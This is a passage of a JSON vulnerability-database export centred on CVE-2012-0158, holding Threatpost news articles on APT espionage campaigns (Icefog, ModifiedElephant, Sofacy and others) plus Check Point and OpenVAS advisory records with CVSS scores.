It was able to connect the dots back to the attack on the Japanese parliament two years ago.\n\n\u201cWe predict the number of small, focused APT-for-hire groups to grow, specializing in hit-and-run operations, a kind of \u2018cyber-mercenaries\u2019 of the modern world,\u201d the report said.\n", "cvss3": {}, "published": "2013-09-25T16:30:30", "type": "threatpost", "title": "Icefog Targeted APT Attacks Hit South Korea, Japan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2012-1723", "CVE-2012-1856", "CVE-2013-0422"], "modified": "2018-03-22T14:54:55", "id": "THREATPOST:191B75DFBFEAFA9F2F649D66191A07C9", "href": "https://threatpost.com/icefog-espionage-campaign-is-hit-and-run-targeted-operation/102417/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:27", "description": "Tibetans, journalists and human rights workers in Hong Kong and Taiwan have been targeted in an APT campaign that makes use of Microsoft Rich Text File (RTF) documents to compromise computers. Researchers say it\u2019s a new strategy by attackers in an ongoing advanced persistent threat that dates back to 2009.\n\nAccording to Arbor Networks, the RTF document-based attack uses four known vulnerabilities (CVE-2012-0158, CVE-2012-1856, CVE-2015-1641 and CVE-2015-1770) in one attachment. 
This is the first time, researchers say, that attackers associated with this APT have packed four vulnerabilities inside a single RTF document.\n\nOnce compromised, the vulnerabilities are being used to deliver malware payloads such as Grabber, T9000, Kivars, PlugX, Gh0StRAT and Agent.XST, according to Arbor Networks, which published a report Monday of its [findings (PDF)](<https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/04/ASERT-Threat-Intelligence-Report-2016-03-The-Four-Element-Sword-Engagement.pdf>).\n\nArbor Networks said attackers are borrowing a best-of-breed mix of past technology used in previous and related APT attacks against similar journalist and human rights targets. \u201cWhat we have been able to do is update an ongoing APT and show how malware, techniques and spear phishing techniques have been refreshed for the present day,\u201d said Curt Wilson, senior threat intelligence analyst at Arbor Networks, in an interview with Threatpost.\n\nIn the week preceding the January 2016 Taiwanese general election, human rights lawyers and Tibetan activists received a phishing email purporting to come from a human rights organization. The email included the subject line \u201cUS Congress sanctions $6 million fund for Tibetans in Nepal and India.\u201d Attached was an RTF file that contained the four-pronged RTF file.\n\nAnyone who opened the email attachment was injected with the Grabber (aka EvilGrab) malware into their computer system\u2019s ctfmon.exe process, Arbor Networks said. Grabber then triggered the download of a host of malicious software such as remote access Trojans, giving attackers access to the system and the ability to load additional malicious code.\n\nPayloads varied from Grabber, T9000, Kivars, PlugX, Gh0StRAT and Agent.XST just as the phishing email subject lines varied. 
\u201c[BULK] TIBET, OUR BELOVED NATION AND WILL NEVER FORGET IT,\u201d read another subject line harboring an RTF file that ultimately infected systems with the Kivars Keylogger Payload.\n\nWilson said none of the payloads or exploits were new. He added, \u201cBeing able to draw a line from one APT to another is an extremely important step when it comes to fighting APTs and ideally \u2013 in this case \u2013 keeping those fighting for human rights out of jail.\u201d\n\nWilson said the espionage campaign against journalists, activists and human rights advocates appears to be connected to an even broader set of targets and operations. Also on Monday, The Citizen Lab, part of the Munk School of Global Affairs, [similarly published a report tracking](<https://citizenlab.org/2016/04/between-hong-kong-and-burma/>) advanced persistence threats targeting Hong Kong and Myanmar/Burman democracy activists.\n", "cvss3": {}, "published": "2016-04-19T07:00:14", "type": "threatpost", "title": "APT Threat Targets Tibetans, Journalists and Human Rights Workers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2012-1856", "CVE-2015-1641", "CVE-2015-1770"], "modified": "2016-04-19T01:45:15", "id": "THREATPOST:DB438BDD32A19C608E74D09992D53881", "href": "https://threatpost.com/apt-targeting-tibetans-packs-four-vulnerabilities-in-one-compromise/117493/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-02-11T21:10:33", "description": "Threat actors are hijacking the devices of India\u2019s human rights lawyers, activists and defenders, planting incriminating evidence to set them up for arrest, researchers warn.\n\nThe actor, dubbed ModifiedElephant, has been at it for at least 10 years, and it\u2019s still active. 
It\u2019s been shafting targets since 2012, if not sooner, going after hundreds of groups and individuals \u2013 some repeatedly \u2013 according to SentinelLabs researchers.\n\nThe operators aren\u2019t what you\u2019d call technical prodigies, but that doesn\u2019t matter. Tom Hegel, threat researcher at SentinelOne, said in a Wednesday [post](<https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/>) that the advanced persistent threat (APT) group \u2013 which may be tied to the [commercial surveillance](<https://threatpost.com/quadream-israeli-spyware-weaponized-iphone-bug/178252/>) industry \u2013 has been muddling along just fine using rudimentary hacking tools such as commercially available remote-access trojans (RATs).\n\nThe APT is snaring victims with spearphishing, delivering malware via rigged documents.\n\nThe group\u2019s preferred malwares include [NetWire](<https://threatpost.com/netwire-rat-back-stealing-payment-card-data/122156/>), [DarkComet](<https://threatpost.com/darkcomet-rat-flames-out-070912/76777/>) and simple keyloggers \u201cwith infrastructure overlaps that allow us to connect long periods of previously unattributed malicious activity,\u201d Hegel wrote.\n\nThe DarkComet RAT, for one, has been used in politically motivated attacks for at least as long as ModifiedElephant has been doing its dirty work. 
In 2012, its author [threw in](<https://threatpost.com/darkcomet-rat-flames-out-070912/76777/>) the towel on development and sales after finding out that [DarkComet was used by the Syrian government](<https://threatpost.com/syrian-government-using-skype-spyware-monitor-rebels-050412/>) in attacks against anti-government activists.\n\n## Frumpy Old Tools\n\n\u201cThere\u2019s something to be said about how mundane the mechanisms of this operation are,\u201d said Juan Andr\u00e9s Guerrero-Saade, threat researcher at SentinelOne and adjunct professor at Johns Hopkins SAIS, [via Twitter](<https://twitter.com/juanandres_gs/status/1491784707008122885?s=20>). \u201cThe malware is either custom garbage [or] commodity garbage. There\u2019s nothing *technically* impressive about this threat actor, instead we marvel at their audacity.\u201d\n\nIn fact, ModifiedElephant uses old Visual Basic keyloggers that \u201care not the least bit technically impressive,\u201d Hegel wrote, noting that the overall keylogger structure resembles code that was freely available on [Italian hacking forums](<https://italianhack.forumfree.it/?t=63131534>) back in 2012. The loggers don\u2019t even work anymore, he said, given that they\u2019re built \u201cin such a brittle fashion.\u201d\n\nModifiedElephant is also sending a commodity Android trojan payload, delivered as an APK file (0330921c85d582deb2b77a4dc53c78b3), along with the NetWire trojan. 
The Android trojan tries to trick recipients into installing the malware themselves, by posing as a news app or a safe messaging tool.\n\nBelow is an example of ModifiedElephant\u2019s phishing emails, which include attachments for the NetWire and Android trojan variants.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/11142225/phishing-email-sample-e1644607361703.jpg>)\n\nModifiedElephant phishing email with malicious attachments for Netwire and [Android GM Bot](<https://threatpost.com/source-code-for-android-banking-malware-leaked/116380/>) variants. Source: SentinelLabs.\n\nThe Android trojan appears to have been designed as a multi-purpose hacking tool for broader cybercrime, researchers said. But the fact that it\u2019s delivered at the same time as NetWire means that the same attacker was trying to target victims across the spectrum, getting them both from the endpoint and on mobile.\n\nThe trojan enables attackers to intercept and manage SMS and call data, wipe or unlock the device, perform network requests, and perform remote administration, according to SentinelLabs: In other words, it\u2019s a basic, ideal, low-cost mobile surveillance toolkit.\n\n## Evidence Tampering\n\nAn example of the incriminating files planted by ModifiedElephant is a file, Ltr_1804_to_cc.pdf, that detailed an assassination plot against India Prime Minister Narendra Modi. 
Arsenal Consulting\u2019s digital analysis shows that the file \u2013 one of the more [incriminating pieces](<https://web.archive.org/web/20210917152050/https://scroll.in/article/991095/why-isnt-the-government-looking-for-the-source-of-modi-assassination-malware-on-rona-wilsons-pc>) of data seized by police \u2013 was one of many files delivered via a NetWire RAT remote session associated with ModifiedElephant.\n\n\u201cFurther analysis showed how ModifiedElephant was performing nearly identical evidence creation and organization across multiple unrelated victim systems within roughly fifteen minutes of each other,\u201d according to SentinelLabs\u2019 detailed [report](<https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/>).\n\nIf the notion of a threat actor tampering with evidence sounds familiar, it might be because ModifiedElephant\u2019s tactics have precedent, Guerrero-Saade [tweeted](<https://twitter.com/juanandres_gs/status/1491784711110234126>).\n\nA few months back, SentinelOne [reported](<https://www.sentinelone.com/labs/egomaniac-an-unscrupulous-turkish-nexus-threat-actor/>) on EGoManiac, a Turkish nexus (as in, its malware contained Turkish language, its lures were written in Turkish, and its victims are Turkish and related to local politics) threat actor that was doing something similar with the Octopus Brain campaign.\n\nIn that campaign, Arsenal Consulting\u2019s digital forensics revealed that the threat actor [planted](<https://otx.alienvault.com/pulse/5859cea0a759501d3b140f5b>) incriminating files on the systems of journalists working at the Turkish online news portal OdaTV immediately before Turkish National Police seized their machines. 
The fabricated files were later used as evidence of terrorism and justification for jailing journalists.\n\n\u201cA threat actor willing to frame and incarcerate vulnerable opponents is a critically underreported dimension of the cyber threat landscape that brings up uncomfortable questions about the integrity of devices introduced as evidence,\u201d SentinelOne\u2019s Hegel pointed out in Wednesday\u2019s post.\n\nAnalyzing EGoManiac\u2019s intrusions revealed the decade\u2019s worth of malicious activity that SentinelLabs now attributes to a previously unknown threat actor \u2013 namely, ModifiedElephant.\n\n\u201cThis actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting,\u201d Hegel said. What\u2019s more, it\u2019s still actively targeting victims.\n\n## Victimology\n\nModifiedElephant\u2019s goal is long-term surveillance, sometimes leading up to the delivery of cooked-up \u201cevidence\u201d that supposedly connects the target to specific crimes right before what Hegel referred to as \u201cconveniently coordinated arrests,\u201d like the files planted on the devices used by OdaTV journalists Bar\u0131\u015f Pehlivan and M\u00fcyesser Y\u0131ld\u0131z.\n\nResearchers have identified hundreds of groups and individuals targeted by ModifiedElephant phishing campaigns: predominantly, they\u2019re activists, human rights defenders, journalists, academics and law professionals in India.\n\nThe APT primarily uses weaponized Microsoft Office files to deliver whichever malware the operators currently favor \u2013 a preference that\u2019s changed over time and depending on the target.\n\nHere\u2019s how the group has evolved over the years, researchers said:\n\n * Mid-2013: the actor used phishing emails containing executable file attachments with fake double extensions (filename.pdf.exe).\n * Post-2015: the actor moved on to less obvious 
files containing publicly available exploits, such as .doc, .pps, .docx, .rar, and password protected .rar files. These attempts involved legitimate lure documents in .pdf, .docx, and .mht formats to captivate the target\u2019s attention while also executing malware.\n * 2019: ModifiedElephant operators employed phishing campaigns that dangled links to files hosted externally for manual download and execution by the target.\n * 2020: As Amnesty International and Citizen Lab [documented](<https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/>), the operators also made use of large .rar archives (up to 300MB), potentially in an attempt to bypass detection, in a coordinated spyware attack that illegally targeted nine human rights defenders.\n\nSentinelLabs found that the lure documents they analyzed repeatedly made use of exploits of vulnerabilities that have been used plenty of times over the years \u2013 [CVE-2012-0158](<https://threatpost.com/extensible-attack-platform-has-familiar-feel/103021/>), [CVE-2014-1761](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>), [CVE-2013-3906](<https://threatpost.com/attacks-on-new-microsoft-zero-day-using-multi-stage-malware/102833/>) and [CVE-2015-1641](<https://threatpost.com/apt-targeting-tibetans-packs-four-vulnerabilities-in-one-compromise/117493/>) \u2013 to drop and execute malware. The spearphishing emails and lures use titles and themes around topics relevant to the target, Hegel said, \u201csuch as activism news and groups, global and local events on climate change, politics, and public service.\u201d\n\nBelow is another phishing example:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/11140538/phishing-sample-e1644606353578.jpg>)\n\nSpearphishing email containing malicious attachment attributed to ModifiedElephant. 
Source: SentinelLabs.\n\n## Critics of Authoritarian Governments, Beware\n\nSentinelOne cautions that it only took a look at \u201ca small subset\u201d of the total list of ModifiedElephant\u2019s potential targets, the actor\u2019s techniques and its objectives.\n\nMore work needs to be done, and many questions remain to be answered. But one thing\u2019s clear, researchers said: \u201cCritics of authoritarian governments around the world must carefully understand the technical capabilities of those who would seek to silence them.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-11T19:57:34", "type": "threatpost", "title": "Cybercrooks Frame Targets by Planting Fabricated Digital Evidence", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2013-3906", "CVE-2014-1761", "CVE-2015-1641", "CVE-2021-44228"], "modified": "2022-02-11T19:57:34", "id": 
"THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "href": "https://threatpost.com/cybercrooks-frame-targets-plant-incriminating-evidence/178384/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offer critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d[](<https://threatpost.com/newsletter-sign/>)The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed about vulnerabilities among attackers between Jan. 
2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. 
Patching ZeroLogon was so slow, Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained varying CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because there wasn\u2019t a clear frontrunning CVE discussed.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:55:59", "description": "A new analysis of the Sofacy APT gang, a Russian-speaking group carrying out targeted attacks against military and government offices for close to a decade, shows a 
relentless wave of intrusions peaking this summer against victims in a number of NATO countries and the Ukraine.\n\nResearchers at Kaspersky Lab this morning [released their update on Sofacy](<https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/>), which is also known as APT28, Fancy Bear, Sednit and a handful of other monikers. The report demonstrates a barrage of zero-day vulnerabilities in Office, Java, Adobe and Windows at the group\u2019s disposal; the zero-days are being used against targets in attacks that remained active as of last month. The gang\u2019s malware implants were uncovered as well as its capabilities to quickly adapt to detection technologies and hit compromised machines with different backdoors so that in case one was found out, there would be fallbacks.\n\nSofacy\u2019s roots go back to around 2007, Kaspersky researchers said, with the name coming from an implant used in attacks four years ago that shared some similarities with the [Miniduke APT](<https://threatpost.com/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713/77569/>) gang uncovered by Kaspersky Lab in 2013 executing espionage activity against governments in Europe.\n\nSofacy\u2019s rapid capability expansion began in 2013 when a number of new backdoors and malware tools were discovered, including CORESHELL, JHUHUGIT and AZZY among others.\n\nThis summer, the AZZY implant got a facelift and was used as recently as October along with a new USB-stealing malware designed to hit air-gapped machines.\n\nIn July, researchers at iSight Partners reported that Sofacy, or Tsar Team as iSight calls them, had dropped their [sixth zero day exploit in four months](<https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825/>), two of which in Office and Java were patched during a span of a few days in July.\n\n\u201cUsually, when someone publishes research on a given cyber-espionage group, the group 
reacts: either it halts its activity or dramatically changes tactics and strategy. With Sofacy, this is not always the case. We have seen it launching attacks for several years now, and its activity has been reported by the security community multiple times,\u201d said Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab.\n\nFive of the six zero days, iSight said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach. Given the underground value of unpatched and unreported vulnerabilities, this was highly unusual behavior, even for a state-sponsored cyberespionage team.\n\nKaspersky researchers said they discovered the group was using a Flash and Java zero day to drop the JHUHUGIT malware implant, which became its most prevalent first-stage implant in subsequent attacks.\n\nThe updated AZZY Trojan, meanwhile, surfaced in August in attacks against higher-profile victims, including, in one case, a defense contractor, Kaspersky researchers said. While the first sample was spotted on July 29 and signatures were quickly added to security systems, Kaspersky researchers said that by Aug. 4, another sample was in the wild. What made the AZZY update stand out was that it was not delivered via a zero-day; instead, it was delivered and installed by separate malware already on the system, a dropper called msdeltemp.dll that the attackers controlled via backdoors in order to send commands to infected machines.\n\n\u201cThis code modification marks an unusual departure from the typical AZZY backdoors, with its C&C communication functions moved to an external DLL file,\u201d Kaspersky researchers wrote in their report. 
\u201cIn the past, the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry, instead of storing it in the malware itself, so this code modularization follows the same line of thinking.\u201d\n\nIn addition to traditional data-stealing capabilities, Sofacy also covets information stored on air-gapped machines and uses its USBSTEALER implant to drain these machines of valuable content.\n\nThis is behavior similar to that of the Equation group, one of the most sophisticated state-sponsored groups, which invested significant resources in developing more than 100 malware implants, each with their own purpose and used selectively against valuable targets.\n\n\u201cIn 2015 its activity increased significantly, deploying no less than five 0-days, making Sofacy one of the most prolific, agile and dynamic threat actors in the arena,\u201d Raiu said. \u201cWe have reasons to believe that these attacks will continue.\u201d\n", "cvss3": {}, "published": "2015-12-04T07:05:37", "type": "threatpost", "title": "Sofacy APT28 Gang Using New Backdoors, Zero Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3333", "CVE-2011-2140", "CVE-2012-0158", "CVE-2012-1856", "CVE-2014-6352", "CVE-2015-2375", "CVE-2015-2376", "CVE-2015-2377", "CVE-2015-2424", "CVE-2015-5119"], "modified": "2015-12-04T21:35:34", "id": "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "href": "https://threatpost.com/relentless-sofacy-apt-attacks-armed-with-zero-days-new-backdoors/115556/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T07:12:50", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer.", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "checkpoint_advisories", "title": "MSCOMCTL.OCX Killbit: 996BF5E0-8044-4650-ADEB-0B013914E99C (MS12-027; CVE-2012-0158)", "bulletinFamily": "info", 
"cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-132", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:12:41", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in an ActiveX control. To trigger this issue, an attacker can create a malicious web page that initiates the vulnerable ActiveX control. Successful exploitation of this vulnerability allows execution of arbitrary code on the vulnerable system.", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "checkpoint_advisories", "title": "MSCOMCTL.OCX Killbit: bdd1f04b-858b-11d1-b16a-00c0f0283628 (MS12-027; CVE-2012-0158)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2016-02-23T00:00:00", "id": "CPAI-2012-133", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:02:41", "description": "A code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to insufficient boundary check in the MSCOMCTL ActiveX control. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows MSCOMCTL.OCX ActiveX Control Remote Code Execution - Ver2 (CVE-2012-0158)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2014-04-16T00:00:00", "id": "CPAI-2014-1384", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:10:12", "description": "A remote code execution vulnerability has been reported in the Microsoft Windows common controls.", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft MSCOMCTL.OCX ActiveX Control Remote Code Execution (MS12-027; CVE-2012-0158)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-129", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:12:44", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in an ActiveX control. To trigger this issue, an attacker can create a malicious web page that initiates the vulnerable ActiveX control. 
Successful exploitation of this vulnerability allows execution of arbitrary code on the vulnerable system.", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "checkpoint_advisories", "title": "MSCOMCTL.OCX Killbit: 9181DC5F-E07D-418A-ACA6-8EEA1ECB8E9E (MS12-027; CVE-2012-0158)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2016-02-23T00:00:00", "id": "CPAI-2012-130", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:12:42", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in an ActiveX control. To trigger this issue, an attacker can create a malicious web page that initiates the vulnerable ActiveX control. 
Successful exploitation of this vulnerability allows execution of arbitrary code on the vulnerable system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2012-04-10T00:00:00", "type": "checkpoint_advisories", "title": "MSCOMCTL.OCX Killbit: C74190B6-8589-11d1-B16A-00C0F0283628 (MS12-027; CVE-2012-0158; CVE-2016-0012)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2016-0012"], "modified": "2016-02-23T00:00:00", "id": "CPAI-2012-131", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:10:34", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:902829", "href": "http://plugins.openvas.org/nasl.php?oid=902829", "sourceData": 
